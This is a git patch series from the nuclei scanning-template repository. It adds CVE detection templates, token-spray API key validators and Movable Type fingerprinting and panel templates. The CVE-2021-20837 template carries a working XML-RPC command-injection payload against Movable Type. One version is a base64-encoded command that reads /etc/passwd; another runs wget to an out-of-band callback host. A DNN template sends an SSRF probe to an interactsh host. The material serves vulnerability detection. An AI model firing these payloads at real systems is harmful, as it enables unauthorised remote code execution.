path: - - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url={{interactsh-url}}' + - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' + + matchers-condition: and matchers: - type: word part: interactsh_protocol words: - - "dns" + - "http" + + - type: status + status: + - 500 \ No newline at end of file From b46d57263659a40acf87242fe7ccad2527ce27f0 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 29 Oct 2021 10:29:18 +0000 Subject: [PATCH 3279/4083] Auto Generated CVE annotations [Fri Oct 29 10:29:18 UTC 2021] :robot: --- cves/2021/CVE-2021-42258.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-42258.yaml b/cves/2021/CVE-2021-42258.yaml index 64def1d504..fa314b25b7 100644 --- a/cves/2021/CVE-2021-42258.yaml +++ b/cves/2021/CVE-2021-42258.yaml @@ -3,7 +3,7 @@ id: CVE-2021-42258 info: name: BillQuick Web Suite SQLi author: dwisiswant0 - severity: high + severity: critical tags: cve,cve2021,sqli,billquick description: | BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 @@ -15,6 +15,11 @@ info: reference: - https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware - https://nvd.nist.gov/vuln/detail/CVE-2021-42258 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-42258 + cwe-id: CWE-89 requests: - raw: From 3eee418ab55b6b5321dd87e512b0930640933c53 Mon Sep 17 00:00:00 2001 From: daffainfo <md15ev@gmail.com> Date: Fri, 29 Oct 2021 18:24:17 +0700 Subject: [PATCH 3280/4083] Add 10 token-spray templates --- token-spray/api-abuseipdb.yaml | 27 +++++++++++++++++++++++++++ token-spray/api-alienvault.yaml | 22 ++++++++++++++++++++++ token-spray/api-aniapi.yaml | 22 ++++++++++++++++++++++ token-spray/api-dribbble.yaml | 20 ++++++++++++++++++++ token-spray/api-europeana.yaml | 20 ++++++++++++++++++++ token-spray/api-iucn.yaml | 21 +++++++++++++++++++++ token-spray/api-myanimelist.yaml | 22 ++++++++++++++++++++++ token-spray/api-rijksmuseum.yaml | 20 ++++++++++++++++++++ token-spray/api-urlscan.yaml | 23 +++++++++++++++++++++++ token-spray/api-virustotal.yaml | 25 +++++++++++++++++++++++++ 10 files changed, 222 insertions(+) create mode 100644 token-spray/api-abuseipdb.yaml create mode 100644 token-spray/api-alienvault.yaml create mode 100644 token-spray/api-aniapi.yaml create mode 100644 token-spray/api-dribbble.yaml create mode 100644 token-spray/api-europeana.yaml create mode 100644 token-spray/api-iucn.yaml create mode 100644 token-spray/api-myanimelist.yaml create mode 100644 token-spray/api-rijksmuseum.yaml create mode 100644 token-spray/api-urlscan.yaml create mode 100644 token-spray/api-virustotal.yaml diff --git a/token-spray/api-abuseipdb.yaml b/token-spray/api-abuseipdb.yaml new file mode 100644 index 0000000000..42fffb3d24 --- /dev/null +++ b/token-spray/api-abuseipdb.yaml @@ -0,0 +1,27 @@ +id: api-abuseipdb + +info: + name: AbuseIPDB API Test + author: daffainfo + reference: https://docs.abuseipdb.com/ + severity: info + tags: token-spray,abuseipdb + +self-contained: true +requests: + - raw: + - | + POST /api/v2/report HTTP/1.1 + Host: api.abuseipdb.com + Key: {{token}} + Accept: application/json + Content-Type: application/x-www-form-urlencoded + Content-Length: 16 + + ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-alienvault.yaml b/token-spray/api-alienvault.yaml new file mode 100644 index 0000000000..a6ba0b4e34 --- /dev/null +++ b/token-spray/api-alienvault.yaml @@ -0,0 +1,22 @@ +id: api-alienvault + +info: + name: AlienVault Open Threat Exchange (OTX) API Test + author: daffainfo + reference: https://otx.alienvault.com/api + severity: info + tags: token-spray,alienvault + +self-contained: true +requests: + - raw: + - | + GET /api/v1/pulses/subscribed?page=1 HTTP/1.1 + Host: otx.alienvault.com + X-OTX-API-KEY: {{token}} + + matchers: + - type: status + negative: true + status: + - 403 diff --git a/token-spray/api-aniapi.yaml b/token-spray/api-aniapi.yaml new file mode 100644 index 0000000000..0585acbdf4 --- /dev/null +++ b/token-spray/api-aniapi.yaml @@ -0,0 +1,22 @@ +id: api-aniapi + +info: + name: AniAPI API Test + author: daffainfo + reference: https://aniapi.com/docs/authentication + severity: info + tags: token-spray,aniapi + +self-contained: true +requests: + - method: GET + path: + - "https://api.aniapi.com/v1/auth/me" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-dribbble.yaml b/token-spray/api-dribbble.yaml new file mode 100644 index 0000000000..1de5e8ff1c --- /dev/null +++ b/token-spray/api-dribbble.yaml @@ -0,0 +1,20 @@ +id: api-dribbble + +info: + name: Dribbble API Test + author: daffainfo + reference: https://developer.dribbble.com/v2/ + severity: info + tags: token-spray,dribbble + +self-contained: true +requests: + - method: GET + path: + - "https://api.dribbble.com/v2/user?access_token={{token}}" + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml new file mode 100644 index 0000000000..3ec7e7be6e --- /dev/null +++ b/token-spray/api-europeana.yaml @@ -0,0 +1,20 @@ +id: api-europeana + +info: + name: Europeana API Test + author: daffainfo + reference: https://pro.europeana.eu/page/search + severity: info + tags: token-spray,europeana + +self-contained: true +requests: + - method: GET + path: + - "https://api.europeana.eu/record/v2/search.json?wskey={{token}}&query=*&rows=0&profile=facets" + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-iucn.yaml b/token-spray/api-iucn.yaml new file mode 100644 index 0000000000..5c8273e3c9 --- /dev/null +++ b/token-spray/api-iucn.yaml @@ -0,0 +1,21 @@ +id: api-iucn + +info: + name: IUCN API Test + author: daffainfo + reference: http://apiv3.iucnredlist.org/api/v3/docs + severity: info + tags: token-spray,iucn + +self-contained: true +requests: + - method: GET + path: + - "http://apiv3.iucnredlist.org/api/v3/country/list?token={{token}}" + + matchers: + - type: word + part: body + words: + - "Token not valid!" + negative: true diff --git a/token-spray/api-myanimelist.yaml b/token-spray/api-myanimelist.yaml new file mode 100644 index 0000000000..369fb7912f --- /dev/null +++ b/token-spray/api-myanimelist.yaml @@ -0,0 +1,22 @@ +id: api-myanimelist + +info: + name: MyAnimeList API Test + author: daffainfo + reference: https://myanimelist.net/apiconfig/references/api/v2 + severity: info + tags: token-spray,myanimelist + +self-contained: true +requests: + - method: GET + path: + - "https://api.myanimelist.net/v2/anime?q=one&limit=4" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-rijksmuseum.yaml b/token-spray/api-rijksmuseum.yaml new file mode 100644 index 0000000000..2687ae3662 --- /dev/null +++ b/token-spray/api-rijksmuseum.yaml @@ -0,0 +1,20 @@ +id: api-rijksmuseum + +info: + name: Rijksmuseum API Test + author: daffainfo + reference: https://data.rijksmuseum.nl/user-generated-content/api/ + severity: info + tags: token-spray,rijksmuseum + +self-contained: true +requests: + - method: GET + path: + - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" + + matchers: + - type: status + negative: true + status: + - 403 diff --git a/token-spray/api-urlscan.yaml b/token-spray/api-urlscan.yaml new file mode 100644 index 0000000000..06c1807fbd --- /dev/null +++ b/token-spray/api-urlscan.yaml @@ -0,0 +1,23 @@ +id: api-urlscan + +info: + name: URLScan API Test + author: daffainfo + reference: https://urlscan.io/docs/api/ + severity: info + tags: token-spray,urlscan + +self-contained: true +requests: + - raw: + - | + GET /user/quotas/ HTTP/1.1 + Host: urlscan.io + Content-Type: application/json + API-Key: {{token}} + + matchers: + - type: status + negative: true + status: + - 401 diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml new file mode 100644 index 0000000000..dbd7de539c --- /dev/null +++ b/token-spray/api-virustotal.yaml @@ -0,0 +1,25 @@ +id: api-virustotal + +info: + name: VirusTotal API Test + author: daffainfo + reference: https://developers.virustotal.com/reference#getting-started + severity: info + tags: token-spray,virustotal + +self-contained: true +requests: + - raw: + - | + POST /vtapi/v2/url/scan HTTP/1.1 + Host: www.virustotal.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 86 + + apikey={{token}}&url=google.com + + matchers: + - type: status + negative: true + status: + - 403 From afbd8f0448af6e1a2a7ae6bc3943edb5724175bc Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 29 Oct 2021 18:13:32 +0530 Subject: [PATCH 3281/4083] Create CVE-2021-20837.yaml --- cves/2021/CVE-2021-20837.yaml | 39 +++++++++++++++++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 cves/2021/CVE-2021-20837.yaml diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml new file mode 100644 index 0000000000..39d51b59e3 --- /dev/null +++ b/cves/2021/CVE-2021-20837.yaml @@ -0,0 +1,39 @@ +id: CVE-2021-20837 + +info: + name: CVE-2021-20837 + author: dhiyaneshDK + severity: high + description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://github.com/ghost-nemesis/cve-2021-20837-poc + - https://twitter.com/cyber_advising/status/1454051725904580608/photo/1 + + tags: cve,cve2021,lfi,rce,misconfig + +requests: + - raw: + - | + POST /cgi-bin/mt/mt-xmlrpc.cgi + Host: {{Hostname}} + Content-Type: text/xml + + <?xml version="1.0" encoding="UTF-8"?> + <methodCall> + <methodName>mt.handler_to_coderef</methodName> + <params> + <param> + <value> + <base64> + YGNhdCAvZXRjL3Bhc3N3ZGA= + </base64> + </value> + </param> + </params> + </methodCall> + matchers-condition: or + matchers: + + - type: regex + regex: + - "root:.*:0:0" From 4236ca70b57af1ad8e0d3a96eb5a95bccfd651dc Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Fri, 29 Oct 2021 12:45:07 +0000 Subject: [PATCH 3282/4083] Auto Generated CVE annotations [Fri Oct 29 12:45:06 UTC 2021] :robot: --- cves/2021/CVE-2021-20837.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml index 39d51b59e3..0dcb39beb6 100644 --- a/cves/2021/CVE-2021-20837.yaml +++ b/cves/2021/CVE-2021-20837.yaml @@ -3,13 +3,18 @@ id: CVE-2021-20837 info: name: CVE-2021-20837 author: dhiyaneshDK - severity: high + severity: critical description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. reference: - https://github.com/ghost-nemesis/cve-2021-20837-poc - https://twitter.com/cyber_advising/status/1454051725904580608/photo/1 tags: cve,cve2021,lfi,rce,misconfig + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-20837 + cwe-id: CWE-78 requests: - raw: From ab2d7dc20bcbb25637160b5691e7e91195180ec4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha <prince@projectdiscovery.io> Date: Fri, 29 Oct 2021 18:58:12 +0530 Subject: [PATCH 3283/4083] Update api-virustotal.yaml --- token-spray/api-virustotal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml index dbd7de539c..b57c6231db 100644 --- a/token-spray/api-virustotal.yaml +++ b/token-spray/api-virustotal.yaml @@ -3,8 +3,8 @@ id: api-virustotal info: name: VirusTotal API Test author: daffainfo - reference: https://developers.virustotal.com/reference#getting-started severity: info + reference: https://developers.virustotal.com/reference#getting-started tags: token-spray,virustotal self-contained: true From d6fbf8b35c588a450bee284a799aeb84dc92c37c Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 21:33:59 +0530 Subject: [PATCH 3284/4083] misc updates --- cves/2021/CVE-2021-20837.yaml | 54 +++++++++++++++++++++-------------- 1 file changed, 32 insertions(+), 22 deletions(-) diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml index 0dcb39beb6..3926fb3239 100644 --- a/cves/2021/CVE-2021-20837.yaml +++ b/cves/2021/CVE-2021-20837.yaml @@ -6,10 +6,11 @@ info: severity: critical description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. reference: + - https://nemesis.sh/posts/movable-type-0day/ - https://github.com/ghost-nemesis/cve-2021-20837-poc - - https://twitter.com/cyber_advising/status/1454051725904580608/photo/1 - - tags: cve,cve2021,lfi,rce,misconfig + - https://twitter.com/cyber_advising/status/1454051725904580608 + - https://nvd.nist.gov/vuln/detail/CVE-2021-20837 + tags: cve,cve2021,rce,movable classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.80 @@ -19,26 +20,35 @@ info: requests: - raw: - | - POST /cgi-bin/mt/mt-xmlrpc.cgi + POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml - <?xml version="1.0" encoding="UTF-8"?> - <methodCall> - <methodName>mt.handler_to_coderef</methodName> - <params> - <param> - <value> - <base64> - YGNhdCAvZXRjL3Bhc3N3ZGA= - </base64> - </value> - </param> - </params> - </methodCall> - matchers-condition: or - matchers: + <?xml version="1.0" encoding="UTF-8"?> + <methodCall> + <methodName>mt.handler_to_coderef</methodName> + <params> + <param> + <value> + <base64> + {{base64("`wget http://{{interactsh-url}}`")}} + </base64> + </value> + </param> + </params> + </methodCall> - - type: regex - regex: - - "root:.*:0:0" + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + + - type: word + words: + - "failed loading package" + + - type: status + status: + - 200 \ No newline at end of file From 1fdf1ce10a0c4492eb105f17805b205f8d5fb03d Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 21:36:05 +0530 Subject: [PATCH 3285/4083] name update --- cves/2021/CVE-2021-20837.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml index 3926fb3239..b4fdbf9be8 100644 --- a/cves/2021/CVE-2021-20837.yaml +++ b/cves/2021/CVE-2021-20837.yaml @@ -1,7 +1,7 @@ id: CVE-2021-20837 info: - name: CVE-2021-20837 + name: Unauthenticated RCE In MovableType author: dhiyaneshDK severity: critical description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. From 9a7111c93612e3b1f3e0ed5edcf983cb36badfdd Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Fri, 29 Oct 2021 22:16:25 +0530 Subject: [PATCH 3286/4083] updating author details --- cves/2021/CVE-2021-20837.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-20837.yaml b/cves/2021/CVE-2021-20837.yaml index b4fdbf9be8..30204d5225 100644 --- a/cves/2021/CVE-2021-20837.yaml +++ b/cves/2021/CVE-2021-20837.yaml @@ -2,7 +2,7 @@ id: CVE-2021-20837 info: name: Unauthenticated RCE In MovableType - author: dhiyaneshDK + author: dhiyaneshDK,hackergautam severity: critical description: 5002 and earlier (Movable Type Advanced 7 Series), Movable Type Advanced 6.8. 2 and earlier (Movable Type Advanced 6 Series), Movable Type Premium 1.46 and earlier, and Movable Type Premium Advanced 1.46 and earlier allow remote attackers to execute arbitrary OS commands via unspecified vectors. reference: From 37ac57aac8f88d1466921ff0d4d7ab1b2651dec2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 29 Oct 2021 22:21:44 +0530 Subject: [PATCH 3287/4083] Create default-movable-page.yaml --- technologies/default-movable-page.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 technologies/default-movable-page.yaml diff --git a/technologies/default-movable-page.yaml b/technologies/default-movable-page.yaml new file mode 100644 index 0000000000..81109fe0e9 --- /dev/null +++ b/technologies/default-movable-page.yaml @@ -0,0 +1,19 @@ +id: default-movable-page + +info: + name: Movable Default Page + author: dhiyaneshDk + severity: info + tags: tech,movable + metadata: + shodan-query: 'title:"Movable Type"' + +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "<title>Welcome to Movable Type" + part: body From 11d24f7e801044bac4469098c28ded764ce47e5d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Oct 2021 22:22:29 +0530 Subject: [PATCH 3288/4083] Update default-movable-page.yaml --- technologies/default-movable-page.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/default-movable-page.yaml b/technologies/default-movable-page.yaml index 81109fe0e9..9009bf9781 100644 --- a/technologies/default-movable-page.yaml +++ b/technologies/default-movable-page.yaml @@ -6,7 +6,7 @@ info: severity: info tags: tech,movable metadata: - shodan-query: 'title:"Movable Type"' + shodan-query: 'title:"Welcome to Movable Type"' requests: - method: GET From b90c0270fccc9edc820f3afcaa0dc1fb87072329 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Oct 2021 22:27:54 +0530 Subject: [PATCH 3289/4083] Create movable-type-login.yaml --- exposed-panels/movable-type-login.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 exposed-panels/movable-type-login.yaml diff --git a/exposed-panels/movable-type-login.yaml b/exposed-panels/movable-type-login.yaml new file mode 100644 index 0000000000..9ed5d79c1e --- /dev/null +++ b/exposed-panels/movable-type-login.yaml @@ -0,0 +1,23 @@ +id: movable-type-login + +info: + name: Movable Type Pro + author: dhiyaneshDk + severity: info + tags: login,movable + metadata: + shodan-query: 'title:"サインイン | Movable Type Pro"' + +requests: + - method: GET + path: + - '{{BaseURL}}/mt/admin' + matchers: + - type: word + words: + - "" + part: body + + - type: status + status: + - 200 From 31880380917668e0d9d444f74b9add18c83dbaab Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Oct 2021 22:30:26 +0530 Subject: [PATCH 3290/4083] Update movable-type-login.yaml --- exposed-panels/movable-type-login.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/movable-type-login.yaml b/exposed-panels/movable-type-login.yaml index 9ed5d79c1e..10a7bfaddb 100644 --- a/exposed-panels/movable-type-login.yaml +++ b/exposed-panels/movable-type-login.yaml @@ -12,6 +12,7 @@ requests: - method: GET path: - '{{BaseURL}}/mt/admin' + - '{{BaseURL}}/mt.cgi' matchers: - type: word words: From f7a25e19e7f1727d0db4533da458cd2ef3b3c690 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:33:59 +0530 Subject: [PATCH 3291/4083] Update api-abuseipdb.yaml --- token-spray/api-abuseipdb.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/token-spray/api-abuseipdb.yaml b/token-spray/api-abuseipdb.yaml index 42fffb3d24..9cf4dddf31 100644 --- a/token-spray/api-abuseipdb.yaml +++ b/token-spray/api-abuseipdb.yaml @@ -3,15 +3,15 @@ id: api-abuseipdb info: name: AbuseIPDB API Test author: daffainfo - reference: https://docs.abuseipdb.com/ severity: info + reference: https://docs.abuseipdb.com/ tags: token-spray,abuseipdb self-contained: true requests: - raw: - | - POST /api/v2/report HTTP/1.1 + POST https://api.abuseipdb.com/api/v2/report HTTP/1.1 Host: api.abuseipdb.com Key: {{token}} Accept: application/json @@ -21,7 +21,9 @@ requests: ip=127.0.0.1&categories=18,22&comment=SSH%20login%20attempts%20with%20user%20root. matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'data":' + - 'ipAddress":' + condition: and From 25ab9d8d85334f7e4fc638dc5f7be314f1cdcc7f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:36:39 +0530 Subject: [PATCH 3292/4083] Update api-alienvault.yaml --- token-spray/api-alienvault.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/token-spray/api-alienvault.yaml b/token-spray/api-alienvault.yaml index a6ba0b4e34..a51c6edc4c 100644 --- a/token-spray/api-alienvault.yaml +++ b/token-spray/api-alienvault.yaml @@ -3,20 +3,22 @@ id: api-alienvault info: name: AlienVault Open Threat Exchange (OTX) API Test author: daffainfo - reference: https://otx.alienvault.com/api severity: info + reference: https://otx.alienvault.com/api tags: token-spray,alienvault self-contained: true requests: - raw: - | - GET /api/v1/pulses/subscribed?page=1 HTTP/1.1 + GET https://otx.alienvault.com/api/v1/pulses/subscribed?page=1 HTTP/1.1 Host: otx.alienvault.com X-OTX-API-KEY: {{token}} matchers: - - type: status - negative: true - status: - - 403 + - type: word + part: body + words: + - '"$schema":' + - '"properties":' + condition: and From ec96f559b534883530730613e3536654c843895b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:48:54 +0530 Subject: [PATCH 3293/4083] Update api-aniapi.yaml --- token-spray/api-aniapi.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/token-spray/api-aniapi.yaml b/token-spray/api-aniapi.yaml index 0585acbdf4..3b5f81a6e5 100644 --- a/token-spray/api-aniapi.yaml +++ b/token-spray/api-aniapi.yaml @@ -3,8 +3,8 @@ id: api-aniapi info: name: AniAPI API Test author: daffainfo - reference: https://aniapi.com/docs/authentication severity: info + reference: https://aniapi.com/docs/authentication tags: token-spray,aniapi self-contained: true @@ -16,7 +16,9 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"username":' + - '"data":' + condition: and From e47c2e8951c6b7d3566b34f669bac067015d9263 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:50:22 +0530 Subject: [PATCH 3294/4083] Update api-dribbble.yaml --- token-spray/api-dribbble.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/token-spray/api-dribbble.yaml b/token-spray/api-dribbble.yaml index 1de5e8ff1c..147b3c2b72 100644 --- a/token-spray/api-dribbble.yaml +++ b/token-spray/api-dribbble.yaml @@ -3,8 +3,8 @@ id: api-dribbble info: name: Dribbble API Test author: daffainfo - reference: https://developer.dribbble.com/v2/ severity: info + reference: https://developer.dribbble.com/v2/ tags: token-spray,dribbble self-contained: true @@ -15,6 +15,5 @@ requests: matchers: - type: status - negative: true status: - - 401 + - 200 From 50793e70c1566334e3fdfa9b76686a4a88d18fed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:51:53 +0530 Subject: [PATCH 3295/4083] Update api-europeana.yaml --- token-spray/api-europeana.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/token-spray/api-europeana.yaml b/token-spray/api-europeana.yaml index 3ec7e7be6e..69c55b1560 100644 --- a/token-spray/api-europeana.yaml +++ b/token-spray/api-europeana.yaml @@ -3,8 +3,8 @@ id: api-europeana info: name: Europeana API Test author: daffainfo - reference: https://pro.europeana.eu/page/search severity: info + reference: https://pro.europeana.eu/page/search tags: token-spray,europeana self-contained: true @@ -15,6 +15,5 @@ requests: matchers: - type: status - negative: true status: - - 401 + - 200 From ec689fb1a1c048c8e5b249d4bb1542908ce64b3b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 29 Oct 2021 22:54:49 +0530 Subject: [PATCH 3296/4083] Create movable-workflow.yaml --- workflows/movable-workflow.yaml | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 workflows/movable-workflow.yaml diff --git a/workflows/movable-workflow.yaml b/workflows/movable-workflow.yaml new file mode 100644 index 0000000000..ebfd1dd181 --- /dev/null +++ b/workflows/movable-workflow.yaml @@ -0,0 +1,12 @@ +id: movable-workflow + +info: + name: Movable Type Security Checks + author: dhiyaneshDk + description: A simple workflow that runs all Movable related nuclei templates on a given target. + +workflows: + - template: technologies/default-movable-page.yaml + subtemplates: + - template: /exposed-panels/movable-type-login.yaml + - template: /cves/2021/CVE-2021-20837.yaml From bb84057623e50f1060c4ff67cc9e9c60b7fdf322 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:55:59 +0530 Subject: [PATCH 3297/4083] Update api-iucn.yaml --- token-spray/api-iucn.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/token-spray/api-iucn.yaml b/token-spray/api-iucn.yaml index 5c8273e3c9..878b4839ed 100644 --- a/token-spray/api-iucn.yaml +++ b/token-spray/api-iucn.yaml @@ -3,8 +3,8 @@ id: api-iucn info: name: IUCN API Test author: daffainfo - reference: http://apiv3.iucnredlist.org/api/v3/docs severity: info + reference: http://apiv3.iucnredlist.org/api/v3/docs tags: token-spray,iucn self-contained: true @@ -17,5 +17,7 @@ requests: - type: word part: body words: - - "Token not valid!" - negative: true + - 'taxonid' + - 'scientific_name' + - 'subspecies' + condition: and From 61b0cecb32cd1573c24c73676e03c3d6e86b8d92 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 22:58:18 +0530 Subject: [PATCH 3298/4083] Update api-myanimelist.yaml --- token-spray/api-myanimelist.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/token-spray/api-myanimelist.yaml b/token-spray/api-myanimelist.yaml index 369fb7912f..498cffa893 100644 --- a/token-spray/api-myanimelist.yaml +++ b/token-spray/api-myanimelist.yaml @@ -3,8 +3,8 @@ id: api-myanimelist info: name: MyAnimeList API Test author: daffainfo - reference: https://myanimelist.net/apiconfig/references/api/v2 severity: info + reference: https://myanimelist.net/apiconfig/references/api/v2 tags: token-spray,myanimelist self-contained: true @@ -16,7 +16,10 @@ requests: Authorization: Bearer {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - '"data":' + - '"paging":' + - '"next":' + condition: and From 998ca11493e3025f24e2116b8f4a18ebc4641562 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 23:00:29 +0530 Subject: [PATCH 3299/4083] Update api-rijksmuseum.yaml --- token-spray/api-rijksmuseum.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/token-spray/api-rijksmuseum.yaml b/token-spray/api-rijksmuseum.yaml index 2687ae3662..20da90151a 100644 --- a/token-spray/api-rijksmuseum.yaml +++ b/token-spray/api-rijksmuseum.yaml @@ -3,8 +3,8 @@ id: api-rijksmuseum info: name: Rijksmuseum API Test author: daffainfo - reference: https://data.rijksmuseum.nl/user-generated-content/api/ severity: info + reference: https://data.rijksmuseum.nl/user-generated-content/api/ tags: token-spray,rijksmuseum self-contained: true @@ -14,7 +14,10 @@ requests: - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" matchers: - - type: status - negative: true - status: - - 403 + - type: word + part: body + words: + - '"count":' + - '"userSets":' + - '"user":' + condition: and From 423b12a7ad919c1eb84b535dfded5c05020de81f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 23:07:20 +0530 Subject: [PATCH 3300/4083] Update api-urlscan.yaml --- token-spray/api-urlscan.yaml | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/token-spray/api-urlscan.yaml b/token-spray/api-urlscan.yaml index 06c1807fbd..4baa2bec8b 100644 --- a/token-spray/api-urlscan.yaml +++ b/token-spray/api-urlscan.yaml @@ -3,21 +3,24 @@ id: api-urlscan info: name: URLScan API Test author: daffainfo - reference: https://urlscan.io/docs/api/ severity: info + reference: https://urlscan.io/docs/api/ tags: token-spray,urlscan self-contained: true requests: - raw: - | - GET /user/quotas/ HTTP/1.1 + GET https://urlscan.io/user/quotas/ HTTP/1.1 Host: urlscan.io Content-Type: application/json API-Key: {{token}} matchers: - - type: status - negative: true - status: - - 401 + - type: word + part: body + words: + - 'X-Rate-Limit-Scope:' + - 'X-Rate-Limit-Limit:' + - 'X-Rate-Limit-Remaining:' + condition: and From 99d42448d3bca3e15e7db6e9f8653586656eee48 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 29 Oct 2021 23:16:10 +0530 Subject: [PATCH 3301/4083] Update api-virustotal.yaml --- token-spray/api-virustotal.yaml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/token-spray/api-virustotal.yaml b/token-spray/api-virustotal.yaml index b57c6231db..b546d99833 100644 --- a/token-spray/api-virustotal.yaml +++ 